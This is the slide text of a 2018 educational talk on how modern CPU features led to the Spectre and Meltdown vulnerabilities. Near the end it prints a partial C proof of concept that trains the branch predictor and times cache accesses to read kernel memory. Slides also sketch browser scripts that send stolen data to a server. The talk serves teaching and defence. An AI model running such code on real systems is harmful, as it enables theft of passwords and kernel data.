The Spectre of Meltdowns

Andriy Berestovskyy
2018
The Spectre of Meltdowns
( ц ) А н д р
і й Б е р е с
т о в с ь к и
й
networking hourTCP
UDP
NAT
IPsec
IPv4
IPv6
internet
protocolsAH
ESP
authentication
authorization
accounting
encapsulation
security
BGP
OSPF
ICMP
ACLSNAT
tunnelPPPoE
GRE
ARP
discovery
NDP
OSI
broadcast
multicast
IGMP
PIM
MAC
DHCP
DNS
fragmentation
semihalf
berestovskyy

The Spectre of Meltdowns
● Evolution of CPUs
● Spectre1
Attack
● Security Holy Grail
● Meltdown3
Attack
● Fixes
● Spectre-Based Meltdown PoC
2
CPU?

Central Processing Unit (CPU) — electronic
circuitry that performs basic arithmetic,
logical, control and input/output operations
specified by the instructions.
— Wikipedia
3
Basic means
simple, right?

Modern CPU Die
4Source: Kaby Lake, https://newsroom.intel.com/press-kits/8th-gen-intel-core/
Why it’s so
complicated?
About 2 billion
transistors
How does it
work?

CPU Basic Operation Cycle*
5
Hardware
implementation?
Start
Fetch Instruction at PC
Decode Instruction
Load Data From Memory
Execute Instruction
Write Data to Memory
Update Registers and PC
* Instruction Cycle

ALU
Simple CPU Implementation*
6
Instruction
Fetch/Decode
Memory
PC
Registers
Performance?
WriteExecuteDecode/LoadInstruction Fetch
* Simplified, just for an example

Instructions Per Second (IPS) — measure of a
computer's processor speed.
— Wikipedia
7
MIPS?
FLOPS?

4MHz CPU Performance
8
Cycle 1
Fetch Decode Execute Write
2 3 4 5 6 7 8
mov ...
xor ...
cmp ...
9
Fetch
4M cycles per second / 4 cycles per instruction = 1 MIPS
Solutions?
mov len(%rip), %rdx
xor %eax, %eax
cmp %rdi, %rdx
...
De
...one cycle per
instruction?
More
performance!

Instruction pipelining — process different parts of
instructions in parallel, i.e. an attempt to keep
every part of the CPU busy.
— Wikipedia
9
Let’s do it!

CPU with Pipeline
10
InstructionFetch/Decode
Memory
PC
InstructionDecode/Execute
Registers
InstructionExecute/Write
ALU
Performance?
Pipeline Stages
* Intel i486 and newer

Performance: Instruction Pipelining
11
Cycle 1
Fetch Decode Execute
2 3 5 6 7 8
Fetch Decode Write
mov ...
xor ...
cmp ...
9
Fetch
Basic Pipeline
Execute Write
div ... Decode Execute Write
Write
4
Execute
Decode
Fetch
How many MIPS for
4MHz CPU now?

4MHz CPU with Pipeline
12
Cycle 1
2 3 4 5 6 7 8
mov ...
xor ...
cmp ...
9
Fetch
4M cycles per second / 1 cycle per instruction = 4 MIPS
Decode Execute Write
mov len(%rip), %rdx
xor %eax, %eax
cmp %rdi, %rdx
...
More
performance!
...more MHz?

8MHz CPU with Pipeline
13
Cycle 1
F D E W
2 3 4 5 6 7 8
mov ...
xor ...
cmp ...
9
More
performance?
F D E W
F D E W
10 11 12 13 14 15 16 17
mov len(%rip), %rdx
xor %eax, %eax
cmp %rdi, %rdx
...

40MHz CPU Performance
14
Cycle
mov ...
xor ...
cmp ...
40M cycles per second / 1 cycle per instruction = 40 MIPS?
Really?
mov len(%rip), %rdx
xor %eax, %eax
cmp %rdi, %rdx
...

Clock Speed Does Not Scale
15
Cycle
mov ...
xor ...
cmp ...
Source: https://en.wikipedia.org/wiki/Megahertz_myth
Why?

Memory Trends
16Source: https://en.wikipedia.org/wiki/CAS_latency (First Word)
DRAM latency is
the same since
mid `90s
Solutions?
More
performance!
...but DRAM is
slow...

Cache — faster memory, closer to a CPU, which
stores copies of frequently used main memory
locations.
— Wikipedia
17
Let’s do it!

CPU with Pipeline and Cache
18
InstructionFetch/Decode
Memory
PC
InstructionDecode/Execute
Registers
InstructionExecute/Write
ALU
Performance?
Data
Cache
Instr.
Cache
Write
Buffer
* Intel i486 and newer
What’s
changed?

divdiv ...
xor ... stall
CPU with Pipeline and Cache
19
Cycle
mov ...
xor ...
cmp ...
40M cycles per second / ~4 cycles per instruction = ~10 MIPS
stall
Stalls :(Stalls :(
Solution?
...but pipeline
sometimes stalls...
More
performance!
cache miss

Superscalar CPU — executes more than one
instruction during a clock cycle using
different execution units.
— Wikipedia
20
Let’s do it!

Superscalar CPU Instruction Cycle
21
Performance?
Start
Fetch Two Instructions
Decode Two Instruction
Load Order: D1, D2
Execute Two Instructions
Write Order: D1, D2
Update Order: D1, D2
* Intel Pentium and newer
Why order?

stalldiv ...
xor ... write ordering
Superscalar CPU with Cache
22
Cycle
mov ...
xor ...
cmp ...
40M CPS / ~4 CPI * 1,5 instructions per cycle = ~15 MIPS
Solutions?
cache miss
read ordering Ordering :(
...but stall due
to ordering...
More
performance!
div

Out-of-Order (dynamic) Execution — processor
executes instructions in order of input data and
execution units availability, not by their original
order in a program.
— Wikipedia
23
Let’s do it!

divdiv ...
xor ...
Out of Order CPU
24
Cycle
mov ...
xor ...
cmp ...
What about
conditional jumps?
cache miss
Read
reordering :(
* Intel Pentium Pro and newer
Write
reordering :(
Re-order buffers
on Intel CPUs
improves average instructions per cycle ratio
Why?

Conditional Jumps
uint8_t array[ 256];
size_t array_size = 256;
uint8_t bounds_check(size_t idx)
{
if (idx < array_size)
return array[idx];
return 0;
}
25
bounds_check:
xor %eax, %eax
cmp %rdi, array_size(%rip)
jbe .L1
mov array(%rdi), %eax
.L1:
ret
Performance?
Full source: https://godbolt.org/g/Snb13E

dependencyjbe ...
mov or
ret?
OoO CPU vs Conditional Jumps
26
Cycle
cmp ... cache miss
Solutions?
xor %eax, %eax
jbe .L1
.L1:
ret
xor ...
stall?
...but next instruction is
unknown...
More
performance!
PC
PC

Speculative Execution —perform some tasks
that may not be needed.
— Wikipedia
27
Let’s do it!

dependencyjbe ...
CPU with Speculative Execution
28
Cycle
cmp ... cache miss
What if speculation is
incorrect?
xor %eax, %eax
jbe .L1
mov array%rdi), %eax
.L1:
ret
xor ...
speculation
cache missmov*
ret* speculation
PC
PC
Continue with
mov!

branch miss penalty
dependencyjbe ...
Branch Miss
29
Cycle
cmp ... cache miss
xor ...
speculation
cache missmov*
ret*
icache missret
Options?
speculation
Flush the
pipeline!
...but branch misses are
very expensive...
More
performance!
PC
miss

Speculation Options
30
xor %eax, %eax
jbe .L1
ret
...
mov array(%rd), %eax
ret
...
Options:
1. Execute left branch
2. Execute right branch
3. Execute both branches
4. Other?
Pros/cons?
Solution?

Branch Predictor — digital circuit that tries to
guess which way a branch will go
before this is known definitively.
— Wikipedia
31
How does it
work?

jbe ...
Branch Predictor
32
cmp ...
xor ...
mov ...
ret ...
...
Y Y Y Y
Branch History Table
N
N N N N
Y Y Y Y
Y Y Y Y
Y N Y
N N N N
N N N N
last n-bits of instruction address
2n
elements
Y Y Y Y
prediction
...
...
Source: https://en.wikipedia.org/wiki/Branch_predictor
Let’s do it!

dependencyjbe ...
CPU with Branch Predictor
33
Cycle
cmp ... cache miss
xor %eax, %eax
jbe .L1
.L1:
ret
xor ...
mov*
ret*
Solutions?
speculationspeculation
cache miss
...but there are no
more ideas...
More
performance!
PC
PC
Prediction: do not take branch

Multi-Core Processor — CPU with two or more
independent processing units called cores, which
read and execute program instructions.
— Wikipedia
34
How many
cores?

CPU Trends
35Source: https://en.wikipedia.org/wiki/List_of_Intel_CPU_microarchitectures and https://en.wikipedia.org/wiki/Transistor_count
CPU clock
limit?
Summary?
72 cores * 4
= 288 threads

CPU Performance Summary
+ Instruction Pipelines
+ Memory Cache
+ Superscalar Execution
+ Out of Order Execution
+ Speculative Execution
+ Branch Prediction
+ Multiple Cores
± CPU Clock (to a certain extent)
36
Modern CPU
Core?

Modern CPU Core
37Source: Skylake Microarchitecture, Intel 64 and IA-32 Architectures Optimization Reference Manual
Instruction Decode Queue (micro-op queue)
Allocate/Rename/Retire/Move Elimination/Zero Idiom
Scheduler
ALU
Vec ALU
Vec Shft
Vec Add
Vec Mul
FMA
DIV
Branch2
ALU
Fast LEA
Vec ALU
Vec Shft
Vec Add
Vec Mul
FMA
Slow Int
Slow LEA
ALU
Fast LEA
Vec ALU
Vec Shuff
LD/STA
LD/STA
STD
STA
32K L1
Data
Cache
256K L2
Cache
32K L1
Instruct.
Cache
MSROM
Decoded
Icache
Legacy Decode Pipeline
Branch Prediction Unit
ALU
SHFT
Branch1
Port 0 Port 1 Port 5 Port 6
P. 2
P. 3
P. 4
P. 7
Modern CPU
Die?
L3

Modern CPU Die
38
A
L
U
A
L
U
A
L
U
1
2
1
BPU
A
L
U
A
L
U
A
L
U
A
L
U
1
2
1
BPU
A
L
U
A
L
U
A
L
U
A
L
U
1
2
1
BPU
A
L
U
L3Cache
L3Cache
System
Agent
Memory Controller
InterconnectGPU
A
L
U
A
L
U
A
L
U
1
2
1
BPU
A
L
U
A
L
U
A
L
U
A
L
U
1
2
1
BPU
A
L
U
A
L
U
A
L
U
A
L
U
1
2
1
BPU
A
L
U
L3Cache
L3Cache
CPU
Core
CPU
Core
CPU
Core
CPU
Core
CPU
Core
CPU
Core
Source: https://newsroom.intel.com/press-kits/8th-gen-intel-core/
So, why it’s so
complicated?
About 2 billion
transistors

Because we need performance!
39
So, what about
Spectre et al?

All Your Secrets Belong to Us ()
uint8_t array[ 256 * 4096];
uint8_t bounds_check(size_t idx)
{
return array[idx * 4096];
return 0;
}
40
bounds_check:
xor %eax, %eax
jbe .L1
sal $12, %rdi
.L1:
ret
Execution?
Full source: https://godbolt.org/g/Snb13E
Why?

dependencyjbe ...
Bounds Check on Modern CPU
41
Cycle
cmp ... cache miss
xor %eax, %eax
jbe .L1
sal $12, %rdi
xor ...
mov*
sal* speculation
cache miss
What about
cache?
PC
PC
speculation

sal* speculation
Virtual Memory
dependencyjbe ...
Memory Prior Cache Misses
42
array
cmp ... cache miss
jbe .L1
sal $12, %rdi
mov* speculationcache miss
What will happen
after execution?
array_size
array_size * 4096
“cold” memory cached memory
PC
PC
Current Cycle

Virtual Memory
dependencyjbe ...
Memory After Cache Misses
43
array
cmp ... cache miss
jbe .L1
sal $12, %rdi
mov* cache miss
array_size
What if we missed
the branch?
PC
PC
Current Cycle
sal* speculation
speculation
array_size * 4096

cmp ... cache miss
Virtual Memory
dependencyjbe ...
Memory After Branch Miss
44
array
sal $12, %rdi
.L1:
ret
mov* cache miss
array_size
PC
sal* speculation
speculation
Side effect!
miss
retPC
Flush the
pipeline!
How to detect
cache side effect?

Observing Cache Side Effects
45
Virtual Memory arrayarray_size
“cold” memory cached memoryuint8_t array[ 256 * 4096];
...
for (i = 0; i < 256; i++) {
start = rdtscp();
tmp = array[i * 4096];
cycles = rdtscp() - start;
...
}
How can we exploit
this side effects?
* Simplification
Speculation
side effect

bounds_check(unsigned long):
xor %eax, %eax
jbe .L1
mov base_array(%rdi), %eax
sal $12, %eax
mov side_effects(%rax), %eax
.L1:
rep ret
Memory Before Indirect Read
46
Virtual Memory base_arrayarray_size
uint8_t side_effects[256 * 4096];
uint8_t base_array[16];
uint8_t bounds_check(uint64_t idx)
{
if (idx < array_size) {
uint8_t byte = base_array[idx];
return side_effects[byte * 4096];
}
return 0;
}
After?
side_effects
byte = base_array[idx]
side_effects[byte * 4096]
precached data
array_size
Full source: https://github.com/berestovskyy/spectre-meltdown
Cache
miss!
Cache
miss!
Why?

xor %eax, %eax
jbe .L1
sal $12, %eax
.L1:
rep ret
Memory After Indirect Read
47
{
uint8_t byte = base_array[idx];
return side_effects[byte * 4096];
}
return 0;
}
Pipeline?
side_effects
byte = base_array[idx]
side_effects[byte * 4096]
precached data
array_size

dependencyjbe ...
Bounds Check Pipeline
48
Cycle
cmp ... array_size
jbe .L1
sal $12, %eax
mov*
mov*
speculation
side_effects
PC
PC
sal*
Data is
precached
Speculative read
from side_effect
Can we reach
outside the array?

xor %eax, %eax
jbe .L1
sal $12, %eax
.L1:
rep ret
Bounds Check Bypass
49
secret
{
uint8_t secret = base_array[idx];
return side_effects[secret * 4096];
}
return 0;
}
Spectre?
side_effects
secret = base_array[idx], idx = secret - base_array
side_effects[secret * 4096]
precached secret
array_size

Putting All Together: Spectre1
1. Call few times bounds_check() with valid index
2. Flush array_size from cache to get cache miss
3. Call bounds_check with index pointing to secret
4. Use secret as an index to side_effects
5. Observe side_effects access time
50Full source: https://github.com/berestovskyy/spectre-meltdown
Summary?

Spectre1
Summary
1. Reason: cache side effects
2. The source code is valid, no (easy) fix in software
3. Cache side-channel might be fixed in the future
4. Reads any byte within current process memory
51
Is it even
dangerous?

1. eBPF
2. Java
3. JavaScript
Online checker:
https://xlab.tencent.com/special/spectre/
4. Other JIT engines
ouch!
Spectre1
Victims
52
Scenarios?

HTTP POST secrets.json5
JavaScript Attack Scenario
53
Web
Browser
Web
Server
GET /1
2 OK index.html
4
GET /spectre.js3
OK spectre.js
Parse
index.html
Execute
spectre.js
Execution?

cmp r15, [rbp - 0xe0]
jnc 0x24dd099bb870
lea rsi, [r12 + rdx * 1]
mov rsi, [rsi + r15 * 1]
shl rsi, 12
and rsi, 0x1ffffff
mov rsi, [rsi + r8 * 1]
xor rsi, rdi
mov rdi, rsi
if (index < base_array.length) {
secret = base_array[index | 0];
secret = (((secret * 4096)|0);
tmp ^= side_effects[index| 0]|0;
}
JavaScript Attack Execution
54
Browser base_array length
passwords
Meltdown?
side_effects
JavaScript JIT
browser passwordsJIT sandbox
Source: Spectre Attacks: Exploiting Speculative Execution, Paul Kocher et al

Most important security feature?
55

Process isolation — hardware and software
technologies designed to protect each process
from other processes by by disallowing
inter-process memory access.
— Wikipedia
56
Hardware?
In practice?

Virtual Memory — abstraction of the resources
that are actually available on a given machine.
Combination of hardware and software maps
Virtual Addresses into Physical Addresses.
— Wikipedia
57
How to map Virtual
to Physical?

Translation Lookaside Buffer (TLB) — stores recent
translations of virtual memory to physical memory,
i.e. address-translation cache. Part of CPU
memory-management unit (MMU).
— Wikipedia
58
Drawings!

Process Isolation
59
Process 1 arraymain()
Process 2 main()
64 bit virtual address space
Kernel syscall()
Physical Memory
data
Swap
Why?
Mapped by OS,
translated using TLB.
How to
communicate?

System Call — programmatic way to request a
service from the kernel. Syscall it is a privilege level
switch, no process context switch, i.e. syscall is
processed in user process context.
— Wikipedia
60
Why no process
context switch?

Skylake TLB Cache Hierarchy
61Source: Skylake Microarchitecture, Intel 64 and IA-32 Architectures Optimization Reference Manual
Level Page Size Entries
Instruction
First Level Data
Instruction
First Level Data
First Level Data
Second Level
Second Level
...how to access
kernel data?
4KB
4KB
2MB/4MB
2MB/4MB
1GB
Shared 4KB and 2/4MB
1GB
128
8 per thread
64
32
4
1536
16
So, if no process
context switch...
Not that
much :(

Start Kernel Map
Kernel Mapping
62
Process 1 array1main()
Process 2 main() Kernel syscall()
Physical Memory
data
Swap
Kernel syscall() data
SYSCALL
data access
Now, how to protect
kernel data?
Bomba!

CPU Privilege Level — per-process operating mode
restrictions on type and scope of operations that
can be performed, i.e. OS to run with more
privileges than application software.
— Wikipedia
63

Start Kernel Map
Privilege Level Switch
64
Process array1main() Kernel syscall() data
kernel is able to access process data
So, what is
Meltdown?
Mega!
privilege level switch (SYSCALL)
process is not able to access kernel data

Meltdown — hardware vulnerability, which allows
a rogue process to read all memory, even when it is
not authorized to do so.
— Wikipedia
65
Kernel is mapped to
each process...

Start Kernel Map
Meltdown
66
Process array1main() Kernel syscall() data
kernel is able to access process data
Let’s do it!
Meltdown :(
process is able to read kernel data

xor %eax, %eax
jbe .L1
sal $12, %eax
.L1:
rep ret
Recap: Bounds Check Bypass
67
secret
{
}
return 0;
}
Can we exploit it to
access kernel data?
side_effects
secret = base_array[idx]
precached secret
array_size

xor %eax, %eax
jbe .L1
sal $12, %eax
.L1:
rep ret
Spectre1
Attack to Kernel Data
68
kernel
{
}
return 0;
}
side_effects
secret = base_array[idx]
precached kernel
array_size
How?

Putting All Together: Meltdown3
1. Find address of a kernel structure (out of scope)
2. Invoke a system call to cache this structure
3. Do Spectre1
, but with kernel address:
a. Call few times bounds_check() with valid index
b. Flush array_size from cache to get a cache miss
c. Call bounds_check with index pointing to kernel structure
d. Use secret as an index to side_effects
e. Observe side_effects access time
69Full source: https://github.com/berestovskyy/spectre-meltdown
Summary?

Meltdown3
Summary
1. Reason 0: hardware bug — accessing memory
and checking privileges in parallel
2. Reason 1: cache side effects (i.e. Spectre)
3. Reason 2: kernel mapped into every process
to privilege, not process context switch
4. Reads any mapped and cached byte
70
Is it even
dangerous?

HTTP POST kernel-data.json5
Meltdown Attack Scenario
71
Web
Browser
Web
Server
GET /1
2 OK index.html
4
GET /meltdown.js3
OK meltdown.js
Parse
index.html
Execute
meltdown.js with
valid syscalls
How to fix?

Fixes: An Open Question
Spectre1
:
1. Speculation barrier
2. Other?
72
Meltdown3
:
1. Process ctx instead of
privilege lvl switch
2. PCID/ASID
3. Other?

Spectre-Based Meltdown PoC
#define MIN_READS 100
#define MAX_READ_CYCLES 1000
#define BRANCH_TRAINS 6
#define BYTE_VALUES 256
#define PAGE_SIZE 4096
size_t array_size = BRANCH_TRAINS;
uint8_t side_effects[BYTE_VALUES * PAGE_SIZE] = {1};
uint8_t base_array[BRANCH_TRAINS];
uint8_t tmp;
char secret[] = "My password";
int fd;
{
return side_effects[base_array[idx] * PAGE_SIZE];
return 0;
}
73
uint8_t read_any_byte(uint64_t addr);
int main(int argc, char **argv)
{
uint8_t byte;
uint64_t addr = (uint64_t)&secret;
addr = argc < 2 ? 0xffffffff81800040ULL
: strtoull(argv[1], NULL, 0);
addr = addr != 0 ? addr : (uint64_t)&secret;
if ((fd = open("/proc/version", O_RDONLY)) < 0)
perror("Error opening /proc/version");
do {
byte = read_any_byte(addr);
printf("0x%" PRIx64 " = 0x%x ('%c')n", addr++,
byte, byte);
} while (byte != 0);
return 0;
}
Meltdown

uint8_t read_any_byte(uint64_t addr)
{
size_t tries, i, sum = 0, cnt = 0, mins[BYTE_VALUES];
addr -= (uint64_t)&base_array;
for (i = 0; i < BYTE_VALUES; i++)
mins[i] = SIZE_MAX;
for (tries = 0; tries < MIN_READS * 5; tries++) {
char buf[PAGE_SIZE];
if (fd > 0 && pread(fd, &buf, sizeof(buf), 0) < 0)
perror("Error reading /proc/version");
...
}
return 0;
}
for (i = 1; i <= BRANCH_TRAINS * 4; i++) {
_mm_clflush(&array_size);
sched_yield();
tmp = bounds_check(addr & (i % BRANCH_TRAINS - 1));
}
for (i = 1; i < BYTE_VALUES; i++) {
__sync_synchronize();
register uint64_t start_tsc = __rdtsc();
tmp = side_effects[i * PAGE_SIZE];
__sync_synchronize();
register uint64_t cycles = __rdtsc() - start_tsc;
_mm_clflush(&side_effects[i * PAGE_SIZE]);
if (cycles > MAX_READ_CYCLES)
break;
else if (cycles < mins[i])
mins[i] = cycles;
if (cnt > MIN_READS && mins[i] < sum / cnt * 2 / 3)
return i;
sum += cycles;
cnt++;
}
Read Any Byte()
Meltdown

References
1. Meltdown and Spectre
https://meltdownattack.com/
2. Spectre Attacks: Exploiting Speculative Execution bye Paul Kocher et al
https://spectreattack.com/spectre.pdf
3. Meltdown by Moritz Lipp et al
https://meltdownattack.com/meltdown.pdf
4. ARM Developer. Vulnerability of Speculative Processors to Cache Timing Side-Channel Mechanism
https://developer.arm.com/support/security-update
5. Intel Software Developer Manuals
https://software.intel.com/en-us/articles/intel-sdm
6. Spectre-based Meltdown proof of concept in just 99 lines of code:
https://github.com/berestovskyy/spectre-meltdown
75

The Spectre of Meltdowns

Recomendados

Recomendados

Más contenido relacionado

La actualidad más candente

La actualidad más candente (20)

Similar a The Spectre of Meltdowns

Similar a The Spectre of Meltdowns (20)

Más de Andriy Berestovskyy

Más de Andriy Berestovskyy (6)

Último

Último (20)

The Spectre of Meltdowns